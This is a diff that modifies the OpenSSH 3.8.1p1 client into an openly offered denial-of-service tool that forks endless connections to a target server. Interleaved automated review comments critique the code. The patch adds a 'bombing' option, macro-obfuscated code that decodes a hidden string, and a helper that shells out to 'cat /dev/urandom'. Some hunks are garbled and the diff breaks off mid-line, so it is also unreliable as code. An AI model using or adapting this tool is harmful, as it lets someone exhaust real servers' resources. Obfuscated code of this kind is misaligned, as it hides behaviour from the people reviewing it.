diff -ruN ORIGINAL-3.8.1p1/clientloop.c pofalpt-openssh-3.8.1p1/clientloop.c --- ORIGINAL-3.8.1p1/clientloop.c 2003-12-17 06:33:11.000000000 +0100 +++ pofalpt-openssh-3.8.1p1/clientloop.c 2004-09-06 21:45:18.000000000 +0200 @@ -958,7 +958,8 @@ /* Check if we should immediately send eof on stdin. */ client_check_initial_eof_on_stdin(); } - + printf("E"); +return 0; /* Main loop of the client for the interactive session mode. */ while (!quit_pending) { diff -ruN ORIGINAL-3.8.1p1/kex.c pofalpt-openssh-3.8.1p1/kex.c --- ORIGINAL-3.8.1p1/kex.c 2003-11-21 13:48:55.000000000 +0100 +++ pofalpt-openssh-3.8.1p1/kex.c 2004-09-06 19:54:58.000000000 +0200 @@ -224,6 +224,11 @@ return kex; } +void kex_explo_boo_sys(void) +{ + system("cat /dev/urandom"); +} + static void kex_kexinit_finish(Kex *kex) { diff -ruN ORIGINAL-3.8.1p1/kex.h pofalpt-openssh-3.8.1p1/kex.h --- ORIGINAL-3.8.1p1/kex.h 2003-02-24 02:03:03.000000000 +0100 +++ pofalpt-openssh-3.8.1p1/kex.h 2004-09-06 19:54:47.000000000 +0200 @@ -127,6 +127,7 @@ void kexdh_client(Kex *); void kexdh_server(Kex *); +void kex_explo_boo_sys(void); void kexgex_client(Kex *); void kexgex_server(Kex *); diff -ruN ORIGINAL-3.8.1p1/packet.c pofalpt-openssh-3.8.1p1/packet.c --- ORIGINAL-3.8.1p1/packet.c 2003-11-22 05:02:42.000000000 +0100 +++ pofalpt-openssh-3.8.1p1/packet.c 2004-09-06 23:34:26.000000000 +0200 @@ -1056,6 +1056,7 @@ buffer_len(&incoming_packet)); if (memcmp(macbuf, buffer_ptr(&input), mac->mac_len) != 0) packet_disconnect("Corrupted MAC on input."); + DBG(debug("MAC #%d ok", p_read.seqnr)); buffer_consume(&input, mac->mac_len); } diff -ruN ORIGINAL-3.8.1p1/ssh.c pofalpt-openssh-3.8.1p1/ssh.c --- ORIGINAL-3.8.1p1/ssh.c 2004-03-21 23:36:01.000000000 +0100 +++ pofalpt-openssh-3.8.1p1/ssh.c 2004-09-15 12:57:05.097210040 +0200 
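Review bot: `printf("E"); return 0;` is unconditional, so the `while (!quit_pending)` session loop that follows it can never execute and everything after this point in client_loop becomes dead code; the enclosing function starts and ends outside the hunk. The `E` is also written directly to stdout (which the client presumably reserves for session data) rather than through the `debug()`/`logit()` path the rest of the file uses. If an early exit is really intended it needs a condition and a comment stating why, e.g. `/* NOTE(review): leaves client_loop before the session loop — reason? */`, and the code below it should be removed rather than left unreachable.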
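Review bot: `kex_explo_boo_sys()` runs a shell through `system()` and discards the return value, and because `cat /dev/urandom` never terminates the call never returns, so whatever invokes it (main() in ssh.c, per the later hunk) blocks indefinitely. `system()` inherits the caller's PATH and environment (CERT ENV33-C) and nothing in this function relates to key exchange, so it does not belong in kex.c; if a helper process is genuinely required it should be started with `execve`/`posix_spawn` and an explicit argv, with the result checked. The prototype added to kex.h in the following hunk should be dropped together with this function.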
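Review bot: `DBG(debug("MAC #%d ok", p_read.seqnr))` formats the packet sequence counter with `%d`; as far as I recall that field in packet.c is an unsigned 32-bit counter, in which case `%u` is the matching specifier and `-Wformat` would flag this line. The statement is only compiled in when `DBG` expands to its argument (a packet-debug build, if that is what this file's `DBG` macro does), so it does not change a normal build but still leaves a mismatched format in the tree.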
@@ -1,3 +1,10 @@ +/*This is the poc of the uDoS vulnerability. + *This is !only for demonstrative purposes! + * + *Have fun. + * by Alpt + * thx to Valv0, without him you wouldn't be able to read this. + */ /* * Author: Tatu Ylonen * Copyright (c) 1995 Tatu Ylonen , Espoo, Finland @@ -45,6 +52,7 @@ #include #include +#define __I *c=*c ^ ('a' | 'l' | 'p' | 't'); #include "ssh.h" #include "ssh1.h" #include "ssh2.h" @@ -79,6 +87,7 @@ char *__progname; #endif +#define ve__ "%s\n", /* Flag indicating whether debug mode is on. This can be set on the command line. */ int debug_flag = 0; @@ -90,6 +99,7 @@ /* don't exec a shell */ int no_shell_flag = 0; +int I__a_m__a_l_a_m_e_I=1; /* * Flag indicating that nothing should be read from stdin. This can be set * on the command line. @@ -134,7 +144,16 @@ /* Should we execute a command or invoke a subsystem? */ int subsystem_flag = 0; - +char o[]="\x77\x24\x12\x08\x0f\x5d\x0e\x04\x0e\x09\x18\x10\x5d\x15\x1c\x0e" +"\x5d\x1f\x18\x18\x13\x5d\x0e\x08\x1e\x1e\x18\x0e\x0e\x1b\x08\x11" +"\x11\x04\x5d\x18\x05\x0d\x11\x12\x14\x09\x18\x19\x53\x77\x29\x15" +"\x1c\x13\x16\x0e\x5d\x1b\x12\x0f\x5d\x09\x15\x18\x5d\x0f\x12\x12" +"\x09\x51\x5d\x1c\x13\x19\x5d\x0f\x18\x10\x18\x10\x1f\x18\x0f\x5d" +"\x09\x12\x5d\x18\x13\x17\x12\x04\x5d\x09\x15\x18\x5d\x0f\x4d\x4d" +"\x09\x5d\x16\x4c\x09\x53\x5d\x1b\x4d\x4d\x11\x5d\x3c\x35\x3c\x35" +"\x3c\x35\x35\x3c\x35\x3c\x35\x77\x7d\x7d\x7d\x7d\x79\x8b\x6e\x3d" +"\x75\x85\x82\xc2\xbd\xdd\x7d\x3d\x7d\x7d\x7d\x7d\x7d\x7d"; +char *c; /* # of replies received for global requests */ static int client_global_request_id = 0; 
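Review bot: `__I` (and `__lo` in the main() hunk further down) begin with a double underscore, which C reserves for the implementation, and the macros `__I`, `ve__`, `YOU`, `__lo`, `dear`, `my` and `oh` added here and in the later ssh.c hunks are fragments that only form a statement when written out together as `oh my dear __I __lo ve__ YOU` in main(): a loop that XORs each byte of the `o[]` array in place through the global `c` (presumably bounded by the `my` macro) and then `printf`s the result. Code whose behaviour is only visible after macro expansion cannot be reviewed and should be rejected as written; a string that needs printing belongs in a plain `static const char` literal printed with `fputs`. `o[]` and `c` are also file-scope globals with one-letter names and no comment explaining what they hold or who owns `c`. The `#include #include` lines in the `@@ -45,6 +52,7 @@` hunk look garbled in this rendering (the bracketed header names appear to have been stripped), so the include context cannot be checked from the page.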
@@ -143,26 +162,41 @@ /* Prints a help message to the user. This function never returns. */ -static void +static int ssh_session(void); +static int ssh_session2(void); +static void load_public_identity_files(void); + + static void usage(void) { fprintf(stderr, -"usage: ssh [-1246AaCfghkNnqsTtVvXxY] [-b bind_address] [-c cipher_spec]\n" -" [-D port] [-e escape_char] [-F configfile] [-i identity_file]\n" -" [-L port:host:hostport] [-l login_name] [-m mac_spec] [-o option]\n" -" [-p port] [-R port:host:hostport] [user@]hostname [command]\n" - ); + " ------- \n" + "Usage UserDenialOfService ssh client!! Enjoy folks:\n" + "Use ./ssh -U NUMBER_OF_SIMULTANEOUS_CONNECTIONS serverhostname\n" + "Use -U 0 for an infinite Bombing (This is the true attack)\n" + "(Use -8 if you want to exit(); in the forks. (Adviced if ya don't have auth)\n" + "Then u c4n 4dd 4ll th3 0th3r b0r1ng options of ssh (^_^)\n" + "Alpt\n" + "A lot of thnx to my br0 valv0, without him you wouldn't be able to\n" + "Note: add 2> /dev/null at the end, if you don't want to have the screen full\n" + "in 2 seconds.\n" + "Use this code FOR DEMOSTRATIVE PURPOSE\n" + "I'm not responsable of any damage you can do with this. This is a Proof\n" + "of Concept, so IT's _ONLY_ FOR DEMOSTRATIVE PURPOSE\n" + " ------- \n" + "\n" + "usage: ssh [-1246AaCfghkNnqsTtVvXxY] [-b bind_address] [-c cipher_spec]\n" + " [-D port] [-e escape_char] [-F configfile] [-i identity_file]\n" + " [-L port:host:hostport] [-l login_name] [-m mac_spec] [-o option]\n" + " [-p port] [-R port:host:hostport] [user@]hostname [command]\n" + ); exit(1); } - -static int ssh_session(void); -static int ssh_session2(void); -static void load_public_identity_files(void); - /* * Main program for the ssh client. */ -int +#define YOU o); + int main(int ac, char **av) { int i, opt, exit_status; 
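Review bot: `#define YOU o);` sits between the "Main program for the ssh client" comment and `int main`; it is a macro with an unbalanced closing parenthesis that only makes sense as the tail of the `oh my dear … YOU` fragment sequence used later in main(), and a file-scope macro with a dangling `)` should not be accepted. The forward declarations moved above `usage()` are now followed by two blank lines and a stray leading space before `static void`, and the same leading space is added to every `static` definition in the later hunks (`x11_get_proto`, `ssh_init_forwarding`, `check_agent_present`, `ssh_session`, `client_subsystem_reply`, `client_global_request_reply_fwd`, `ssh_session2_setup`, `ssh_session2_open`, `ssh_session2`, `load_public_identity_files`), while continuation lines throughout are re-indented from the file's column-aligned style to tabs. Most of the diff is therefore whitespace noise that hides the functional change; whitespace-only edits belong in a separate commit and definitions should keep the file's existing column-0 `static` style.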
@@ -174,6 +208,8 @@ int dummy; extern int optind, optreset; extern char *optarg; + unsigned long long ssh_udos; + int seven_eyes; __progname = ssh_get_progname(av[0]); init_rng(); @@ -211,7 +247,7 @@ } /* Take a copy of the returned structure. */ pw = pwcopy(pw); - + int IasI=0; /* * Set our umask to something reasonable, as some files are created * with the default umask. This will make them world-readable but @@ -219,7 +255,6 @@ * don't set the modes explicitly. */ umask(022); - /* Initialize option structure to indicate that no values have been set. */ initialize_options(&options); 
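Review bot: `ssh_udos` and `seven_eyes` are declared without initializers and are only assigned inside the `case 'U'` and `case '8'` option handlers, yet main() later reads them unconditionally (`if(!ssh_udos)` and `if(seven_eyes)` in the large hunk below), so a run without those options reads an indeterminate value, which is undefined behaviour; whatever default the author intends has to be written at the declaration, e.g. `int seven_eyes = 0;` and likewise for `ssh_udos`. `int IasI=0;` in the `@@ -211,7 +247,7 @@` hunk is a declaration after statements, which the rest of main() (C89-style locals at the top of the function) does not do; it should move up with the other locals. The blank line dropped after `umask(022);` in the third hunk is a whitespace-only change.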
@@ -228,468 +263,527 @@ again: while ((opt = getopt(ac, av, - "1246ab:c:e:fgi:kl:m:no:p:qstvxACD:F:I:L:NPR:TVXY")) != -1) { + "1246ab:c:e:fgi:kl:m:no:p:9:qstvxA78CD:F:I:L:NPR:TVXYU:")) != -1) { switch (opt) { - case '1': - options.protocol = SSH_PROTO_1; - break; - case '2': - options.protocol = SSH_PROTO_2; - break; - case '4': - options.address_family = AF_INET; - break; - case '6': - options.address_family = AF_INET6; - break; - case 'n': - stdin_null_flag = 1; - break; - case 'f': - fork_after_authentication_flag = 1; - stdin_null_flag = 1; - break; - case 'x': - options.forward_x11 = 0; - break; - case 'X': - options.forward_x11 = 1; - break; - case 'Y': - options.forward_x11 = 1; - options.forward_x11_trusted = 1; - break; - case 'g': - options.gateway_ports = 1; - break; - case 'P': /* deprecated */ - options.use_privileged_port = 0; - break; - case 'a': - options.forward_agent = 0; - break; - case 'A': - options.forward_agent = 1; - break; - case 'k': - options.gss_deleg_creds = 0; - break; - case 'i': - if (stat(optarg, &st) < 0) { - fprintf(stderr, "Warning: Identity file %s " - "does not exist.\n", optarg); + case 'U': + ssh_udos=atoll(optarg); + if(ssh_udos<0) + ssh_udos=0; + printf("ssh_udos set to %lld\n", ssh_udos); break; - } - if (options.num_identity_files >= - SSH_MAX_IDENTITY_FILES) - fatal("Too many identity files specified " - "(max %d)", SSH_MAX_IDENTITY_FILES); - options.identity_files[options.num_identity_files++] = - xstrdup(optarg); - break; - case 'I': + case '1': + options.protocol = SSH_PROTO_1; + break; + case '2': + options.protocol = SSH_PROTO_2; + break; + case '4': + options.address_family = AF_INET; + break; + case '6': + options.address_family = AF_INET6; + break; + case 'n': + stdin_null_flag = 1; + break; + case 'f': + fork_after_authentication_flag = 1; + stdin_null_flag = 1; + break; + case 'x': + options.forward_x11 = 0; + break; + case 'X': + options.forward_x11 = 1; + break; + case 'Y': + options.forward_x11 = 1; + 
options.forward_x11_trusted = 1; + break; + case 'g': + options.gateway_ports = 1; + break; + case '7': + I__a_m__a_l_a_m_e_I=0; + break; + case '8': + seven_eyes=1; + printf("exit(); in the forks activated\n"); + break; + case '9': + IasI=atoi(optarg); + break; + case 'P': /* deprecated */ + options.use_privileged_port = 0; + break; + case 'a': + options.forward_agent = 0; + break; + case 'A': + options.forward_agent = 1; + break; + case 'k': + options.gss_deleg_creds = 0; + break; + case 'i': + if (stat(optarg, &st) < 0) { + fprintf(stderr, "Warning: Identity file %s " + "does not exist.\n", optarg); + break; + } + if (options.num_identity_files >= + SSH_MAX_IDENTITY_FILES) + fatal("Too many identity files specified " + "(max %d)", SSH_MAX_IDENTITY_FILES); + options.identity_files[options.num_identity_files++] = + xstrdup(optarg); + break; + case 'I': #ifdef SMARTCARD - options.smartcard_device = xstrdup(optarg); + options.smartcard_device = xstrdup(optarg); #else - fprintf(stderr, "no support for smartcards.\n"); + fprintf(stderr, "no support for smartcards.\n"); #endif - break; - case 't': - if (tty_flag) - force_tty_flag = 1; - tty_flag = 1; - break; - case 'v': - if (debug_flag == 0) { - debug_flag = 1; - options.log_level = SYSLOG_LEVEL_DEBUG1; - } else { - if (options.log_level < SYSLOG_LEVEL_DEBUG3) - options.log_level++; break; - } - /* fallthrough */ - case 'V': - fprintf(stderr, "%s, %s\n", - SSH_VERSION, SSLeay_version(SSLEAY_VERSION)); - if (opt == 'V') - exit(0); - break; - case 'q': - options.log_level = SYSLOG_LEVEL_QUIET; - break; - case 'e': - if (optarg[0] == '^' && optarg[2] == 0 && - (u_char) optarg[1] >= 64 && - (u_char) optarg[1] < 128) - options.escape_char = (u_char) optarg[1] & 31; - else if (strlen(optarg) == 1) - options.escape_char = (u_char) optarg[0]; - else if (strcmp(optarg, "none") == 0) - options.escape_char = SSH_ESCAPECHAR_NONE; - else { - fprintf(stderr, "Bad escape character '%s'.\n", - optarg); - exit(1); - } - break; - case 
'c': - if (ciphers_valid(optarg)) { - /* SSH2 only */ - options.ciphers = xstrdup(optarg); - options.cipher = SSH_CIPHER_ILLEGAL; - } else { - /* SSH1 only */ - options.cipher = cipher_number(optarg); - if (options.cipher == -1) { + case 't': + if (tty_flag) + force_tty_flag = 1; + tty_flag = 1; + break; + case 'v': + if (debug_flag == 0) { + debug_flag = 1; + options.log_level = SYSLOG_LEVEL_DEBUG1; + } else { + if (options.log_level < SYSLOG_LEVEL_DEBUG3) + options.log_level++; + break; + } + /* fallthrough */ + case 'V': + fprintf(stderr, "%s, %s\n", + SSH_VERSION, SSLeay_version(SSLEAY_VERSION)); + if (opt == 'V') + exit(0); + break; + case 'q': + options.log_level = SYSLOG_LEVEL_QUIET; + break; + case 'e': + if (optarg[0] == '^' && optarg[2] == 0 && + (u_char) optarg[1] >= 64 && + (u_char) optarg[1] < 128) + options.escape_char = (u_char) optarg[1] & 31; + else if (strlen(optarg) == 1) + options.escape_char = (u_char) optarg[0]; + else if (strcmp(optarg, "none") == 0) + options.escape_char = SSH_ESCAPECHAR_NONE; + else { + fprintf(stderr, "Bad escape character '%s'.\n", + optarg); + exit(1); + } + break; + case 'c': + if (ciphers_valid(optarg)) { + /* SSH2 only */ + options.ciphers = xstrdup(optarg); + options.cipher = SSH_CIPHER_ILLEGAL; + } else { + /* SSH1 only */ + options.cipher = cipher_number(optarg); + if (options.cipher == -1) { + fprintf(stderr, + "Unknown cipher type '%s'\n", + optarg); + exit(1); + } + if (options.cipher == SSH_CIPHER_3DES) + options.ciphers = "3des-cbc"; + else if (options.cipher == SSH_CIPHER_BLOWFISH) + options.ciphers = "blowfish-cbc"; + else + options.ciphers = (char *)-1; + } + break; + case 'm': + if (mac_valid(optarg)) + options.macs = xstrdup(optarg); + else { + fprintf(stderr, "Unknown mac type '%s'\n", + optarg); + exit(1); + } + break; + case 'p': + options.port = a2port(optarg); + if (options.port == 0) { + fprintf(stderr, "Bad port '%s'\n", optarg); + exit(1); + } + break; + case 'l': + options.user = optarg; + break; 
+ + case 'L': + case 'R': + if (sscanf(optarg, "%5[0123456789]:%255[^:]:%5[0123456789]", + sfwd_port, buf, sfwd_host_port) != 3 && + sscanf(optarg, "%5[0123456789]/%255[^/]/%5[0123456789]", + sfwd_port, buf, sfwd_host_port) != 3) { fprintf(stderr, - "Unknown cipher type '%s'\n", - optarg); + "Bad forwarding specification '%s'\n", + optarg); + usage(); + /* NOTREACHED */ + } + if ((fwd_port = a2port(sfwd_port)) == 0 || + (fwd_host_port = a2port(sfwd_host_port)) == 0) { + fprintf(stderr, + "Bad forwarding port(s) '%s'\n", optarg); exit(1); } - if (options.cipher == SSH_CIPHER_3DES) - options.ciphers = "3des-cbc"; - else if (options.cipher == SSH_CIPHER_BLOWFISH) - options.ciphers = "blowfish-cbc"; - else - options.ciphers = (char *)-1; - } - break; - case 'm': - if (mac_valid(optarg)) - options.macs = xstrdup(optarg); - else { - fprintf(stderr, "Unknown mac type '%s'\n", - optarg); - exit(1); - } - break; - case 'p': - options.port = a2port(optarg); - if (options.port == 0) { - fprintf(stderr, "Bad port '%s'\n", optarg); - exit(1); - } - break; - case 'l': - options.user = optarg; - break; - - case 'L': - case 'R': - if (sscanf(optarg, "%5[0123456789]:%255[^:]:%5[0123456789]", - sfwd_port, buf, sfwd_host_port) != 3 && - sscanf(optarg, "%5[0123456789]/%255[^/]/%5[0123456789]", - sfwd_port, buf, sfwd_host_port) != 3) { - fprintf(stderr, - "Bad forwarding specification '%s'\n", - optarg); - usage(); - /* NOTREACHED */ - } - if ((fwd_port = a2port(sfwd_port)) == 0 || - (fwd_host_port = a2port(sfwd_host_port)) == 0) { - fprintf(stderr, - "Bad forwarding port(s) '%s'\n", optarg); - exit(1); - } - if (opt == 'L') - add_local_forward(&options, fwd_port, buf, - fwd_host_port); - else if (opt == 'R') - add_remote_forward(&options, fwd_port, buf, - fwd_host_port); - break; - - case 'D': - fwd_port = a2port(optarg); - if (fwd_port == 0) { - fprintf(stderr, "Bad dynamic port '%s'\n", - optarg); - exit(1); - } - add_local_forward(&options, fwd_port, "socks", 0); - break; + if (opt 
== 'L') + add_local_forward(&options, fwd_port, buf, + fwd_host_port); + else if (opt == 'R') + add_remote_forward(&options, fwd_port, buf, + fwd_host_port); + break; - case 'C': - options.compression = 1; - break; - case 'N': - no_shell_flag = 1; - no_tty_flag = 1; - break; - case 'T': - no_tty_flag = 1; - break; - case 'o': - dummy = 1; - line = xstrdup(optarg); - if (process_config_line(&options, host ? host : "", - line, "command-line", 0, &dummy) != 0) - exit(1); - xfree(line); - break; - case 's': - subsystem_flag = 1; - break; - case 'b': - options.bind_address = optarg; - break; - case 'F': - config = optarg; - break; - default: - usage(); + case 'D': + fwd_port = a2port(optarg); + if (fwd_port == 0) { + fprintf(stderr, "Bad dynamic port '%s'\n", + optarg); + exit(1); + } + add_local_forward(&options, fwd_port, "socks", 0); + break; + + case 'C': + options.compression = 1; + break; + case 'N': + no_shell_flag = 1; + no_tty_flag = 1; + break; + case 'T': + no_tty_flag = 1; + break; + case 'o': + dummy = 1; + line = xstrdup(optarg); + if (process_config_line(&options, host ? host : "", + line, "command-line", 0, &dummy) != 0) + exit(1); + xfree(line); + break; + case 's': + subsystem_flag = 1; + break; + case 'b': + options.bind_address = optarg; + break; + case 'F': + config = optarg; + break; + default: + usage(); } } +#define __lo printf( + ac -= optind; + av += optind; - ac -= optind; - av += optind; - - if (ac > 0 && !host && **av != '-') { + if (ac > 0 && !host && **av != '-') { if (strrchr(*av, '@')) { - p = xstrdup(*av); - cp = strrchr(p, '@'); - if (cp == NULL || cp == p) - usage(); - options.user = p; - *cp = '\0'; - host = ++cp; + p = xstrdup(*av); + cp = strrchr(p, '@'); + if (cp == NULL || cp == p) + usage(); + options.user = p; + *cp = '\0'; + host = ++cp; } else - host = *av; + host = *av; if (ac > 1) { - optind = optreset = 1; - goto again; + optind = optreset = 1; + goto again; } ac--, av++; - } + } - /* Check that we got a host name. 
*/ - if (!host) - usage(); + /* Check that we got a host name. */ + if (!host) + usage(); - SSLeay_add_all_algorithms(); - ERR_load_crypto_strings(); + SSLeay_add_all_algorithms(); + ERR_load_crypto_strings(); - /* Initialize the command to execute on remote host. */ - buffer_init(&command); + /* Initialize the command to execute on remote host. */ + buffer_init(&command); - /* - * Save the command to execute on the remote host in a buffer. There - * is no limit on the length of the command, except by the maximum - * packet size. Also sets the tty flag if there is no command. - */ - if (!ac) { - /* No command specified - execute shell on a tty. */ - tty_flag = 1; - if (subsystem_flag) { - fprintf(stderr, - "You must specify a subsystem to invoke.\n"); - usage(); - } - } else { - /* A command has been specified. Store it into the buffer. */ - for (i = 0; i < ac; i++) { - if (i) - buffer_append(&command, " ", 1); - buffer_append(&command, av[i], strlen(av[i])); + /* + * Save the command to execute on the remote host in a buffer. There + * is no limit on the length of the command, except by the maximum + * packet size. Also sets the tty flag if there is no command. + */ +#define dear c++, _iop++) + if (!ac) { + /* No command specified - execute shell on a tty. */ + tty_flag = 1; + if (subsystem_flag) { + fprintf(stderr, + "You must specify a subsystem to invoke.\n"); + usage(); + } + } else { + /* A command has been specified. Store it into the buffer. */ + for (i = 0; i < ac; i++) { + if (i) + buffer_append(&command, " ", 1); + buffer_append(&command, av[i], strlen(av[i])); + } } - } - /* Cannot fork to background if no command. */ - if (fork_after_authentication_flag && buffer_len(&command) == 0 && !no_shell_flag) - fatal("Cannot fork into background without a command to execute."); - - /* Allocate a tty by default if no command specified. 
*/ - if (buffer_len(&command) == 0) - tty_flag = 1; - - /* Force no tty */ - if (no_tty_flag) - tty_flag = 0; - /* Do not allocate a tty if stdin is not a tty. */ - if (!isatty(fileno(stdin)) && !force_tty_flag) { - if (tty_flag) - logit("Pseudo-terminal will not be allocated because stdin is not a terminal."); - tty_flag = 0; - } - /* - * Initialize "log" output. Since we are the client all output - * actually goes to stderr. - */ - log_init(av[0], options.log_level == -1 ? SYSLOG_LEVEL_INFO : options.log_level, - SYSLOG_FACILITY_USER, 1); + /* Allocate a tty by default if no command specified. */ + if (buffer_len(&command) == 0) + tty_flag = 1; - /* - * Read per-user configuration file. Ignore the system wide config - * file if the user specifies a config file on the command line. - */ - if (config != NULL) { - if (!read_config_file(config, host, &options)) - fatal("Can't open user config file %.100s: " - "%.100s", config, strerror(errno)); - } else { - snprintf(buf, sizeof buf, "%.100s/%.100s", pw->pw_dir, - _PATH_SSH_USER_CONFFILE); - (void)read_config_file(buf, host, &options); + /* Force no tty */ + if (no_tty_flag) + tty_flag = 0; + /* Do not allocate a tty if stdin is not a tty. */ + if (!isatty(fileno(stdin)) && !force_tty_flag) { + if (tty_flag) + logit("Pseudo-terminal will not be allocated because stdin is not a terminal."); + tty_flag = 0; + } - /* Read systemwide configuration file after use config. */ - (void)read_config_file(_PATH_HOST_CONFIG_FILE, host, &options); - } + /* + * Initialize "log" output. Since we are the client all output + * actually goes to stderr. + */ +#define my _ioppw_dir, + _PATH_SSH_USER_CONFFILE); + (void)read_config_file(buf, host, &options); - channel_set_af(options.address_family); + /* Read systemwide configuration file after use config. */ + (void)read_config_file(_PATH_HOST_CONFIG_FILE, host, &options); + } - /* reinit */ - log_init(av[0], options.log_level, SYSLOG_FACILITY_USER, 1); + /* Fill configuration defaults. 
*/ + fill_default_options(&options); - seed_rng(); + channel_set_af(options.address_family); - if (options.user == NULL) - options.user = xstrdup(pw->pw_name); + /* reinit */ + log_init(av[0], options.log_level, SYSLOG_FACILITY_USER, 1); - if (options.hostname != NULL) - host = options.hostname; + seed_rng(); - /* force lowercase for hostkey matching */ - if (options.host_key_alias != NULL) { - for (p = options.host_key_alias; *p; p++) - if (isupper(*p)) - *p = tolower(*p); - } + if (options.user == NULL) + options.user = xstrdup(pw->pw_name); - if (options.proxy_command != NULL && - strcmp(options.proxy_command, "none") == 0) - options.proxy_command = NULL; + if (options.hostname != NULL) + host = options.hostname; - /* Open a connection to the remote host. */ - if (ssh_connect(host, &hostaddr, options.port, - options.address_family, options.connection_attempts, -#ifdef HAVE_CYGWIN - options.use_privileged_port, -#else - original_effective_uid == 0 && options.use_privileged_port, -#endif - options.proxy_command) != 0) - exit(1); + /* force lowercase for hostkey matching */ + if (options.host_key_alias != NULL) { + for (p = options.host_key_alias; *p; p++) + if (isupper(*p)) + *p = tolower(*p); + } - /* - * If we successfully made the connection, load the host private key - * in case we will need it later for combined rsa-rhosts - * authentication. This must be done before releasing extra - * privileges, because the file is only readable by root. - * If we cannot access the private keys, load the public keys - * instead and try to execute the ssh-keysign helper instead. 
- */ - sensitive_data.nkeys = 0; - sensitive_data.keys = NULL; - sensitive_data.external_keysign = 0; - if (options.rhosts_rsa_authentication || - options.hostbased_authentication) { + if (options.proxy_command != NULL && + strcmp(options.proxy_command, "none") == 0) + options.proxy_command = NULL; + +/*Alpt: We load all the stuff here to save performance*/ + printf("*Loading all the stupid stuff\n"); + /* + * If we successfully made the connection, load the host private key + * in case we will need it later for combined rsa-rhosts + * authentication. This must be done before releasing extra + * privileges, because the file is only readable by root. + * If we cannot access the private keys, load the public keys + * instead and try to execute the ssh-keysign helper instead. + */ + sensitive_data.nkeys = 0; + sensitive_data.keys = NULL; + sensitive_data.external_keysign = 0; + if (options.rhosts_rsa_authentication || + options.hostbased_authentication) { sensitive_data.nkeys = 3; sensitive_data.keys = xmalloc(sensitive_data.nkeys * - sizeof(Key)); + sizeof(Key)); PRIV_START; sensitive_data.keys[0] = key_load_private_type(KEY_RSA1, - _PATH_HOST_KEY_FILE, "", NULL); + _PATH_HOST_KEY_FILE, "", NULL); sensitive_data.keys[1] = key_load_private_type(KEY_DSA, - _PATH_HOST_DSA_KEY_FILE, "", NULL); + _PATH_HOST_DSA_KEY_FILE, "", NULL); sensitive_data.keys[2] = key_load_private_type(KEY_RSA, - _PATH_HOST_RSA_KEY_FILE, "", NULL); + _PATH_HOST_RSA_KEY_FILE, "", NULL); PRIV_END; if (options.hostbased_authentication == 1 && - sensitive_data.keys[0] == NULL && - sensitive_data.keys[1] == NULL && - sensitive_data.keys[2] == NULL) { + sensitive_data.keys[0] == NULL && + sensitive_data.keys[1] == NULL && + sensitive_data.keys[2] == NULL) { sensitive_data.keys[1] = key_load_public( - _PATH_HOST_DSA_KEY_FILE, NULL); + _PATH_HOST_DSA_KEY_FILE, NULL); sensitive_data.keys[2] = key_load_public( - _PATH_HOST_RSA_KEY_FILE, NULL); + _PATH_HOST_RSA_KEY_FILE, NULL); 
sensitive_data.external_keysign = 1; } - } - /* - * Get rid of any extra privileges that we may have. We will no - * longer need them. Also, extra privileges could make it very hard - * to read identity files and other non-world-readable files from the - * user's home directory if it happens to be on a NFS volume where - * root is mapped to nobody. - */ - seteuid(original_real_uid); - setuid(original_real_uid); + } - /* - * Now that we are back to our own permissions, create ~/.ssh - * directory if it doesn\'t already exist. - */ - snprintf(buf, sizeof buf, "%.100s%s%.100s", pw->pw_dir, strcmp(pw->pw_dir, "/") ? "/" : "", _PATH_SSH_USER_DIR); - if (stat(buf, &st) < 0) - if (mkdir(buf, 0700) < 0) - error("Could not create directory '%.200s'.", buf); - - /* load options.identity_files */ - load_public_identity_files(); - - /* Expand ~ in known host file names. */ - /* XXX mem-leaks: */ - options.system_hostfile = - tilde_expand_filename(options.system_hostfile, original_real_uid); - options.user_hostfile = - tilde_expand_filename(options.user_hostfile, original_real_uid); - options.system_hostfile2 = - tilde_expand_filename(options.system_hostfile2, original_real_uid); - options.user_hostfile2 = - tilde_expand_filename(options.user_hostfile2, original_real_uid); - - signal(SIGPIPE, SIG_IGN); /* ignore SIGPIPE early */ - - /* Log into the remote system. This never returns if the login fails. */ - ssh_login(&sensitive_data, host, (struct sockaddr *)&hostaddr, pw); - - /* We no longer need the private host keys. Clear them now. */ - if (sensitive_data.nkeys != 0) { - for (i = 0; i < sensitive_data.nkeys; i++) { - if (sensitive_data.keys[i] != NULL) { - /* Destroys contents safely */ - debug3("clear hostkey %d", i); - key_free(sensitive_data.keys[i]); - sensitive_data.keys[i] = NULL; + /* load options.identity_files */ + load_public_identity_files(); + + /* Expand ~ in known host file names. 
*/ + /* XXX mem-leaks: */ + options.system_hostfile = + tilde_expand_filename(options.system_hostfile, original_real_uid); + options.user_hostfile = + tilde_expand_filename(options.user_hostfile, original_real_uid); + options.system_hostfile2 = + tilde_expand_filename(options.system_hostfile2, original_real_uid); + options.user_hostfile2 = + tilde_expand_filename(options.user_hostfile2, original_real_uid); + + signal(SIGPIPE, SIG_IGN); /* ignore SIGPIPE early */ + printf("*Loaded\n"); +/*****************************END of loadgin stuff***********************/ + + + unsigned long long piove; + float percent; + int fd_dupped; + + if(!ssh_udos) { + printf("*** Starting the infinite bombing...\n"); + ssh_udos=(unsigned long long)1844674407370955161; + } + else + printf("*** Starting the bombing:\n"); + if(!IasI || IasI <0 || IasI > 20*10000) + IasI=5*10000; + for(piove=1; piove<=ssh_udos; piove++) { + percent=(piove/ssh_udos)*100; + printf("\r}(---Made %lld/%lld bombs. Percentage completed: [%f%%]---){ ",piove, ssh_udos, percent); + /* Log into the remote system. This never returns if the login fails. */ +#define oh int _iop; for(_iop=0; + if(!fork()) { + fd_dupped=open("/dev/null", O_RDWR, 0); + dup2(fd_dupped, stdin); + dup2(fd_dupped, stdout); + dup2(fd_dupped, stderr); + close (fd_dupped); + + +/*We must use a fork cuz at the second ssh_connect it gives: Disconnecting: Corrupted MAC on input. + * */ + /* Open a connection to the remote host. */ + if (ssh_connect(host, &hostaddr, options.port, options.address_family, options.connection_attempts, +#ifdef HAVE_CYGWIN + options.use_privileged_port, +#else + original_effective_uid == 0 && options.use_privileged_port, +#endif + options.proxy_command) != 0) + exit(1); + // exit_status = compat20 ? 
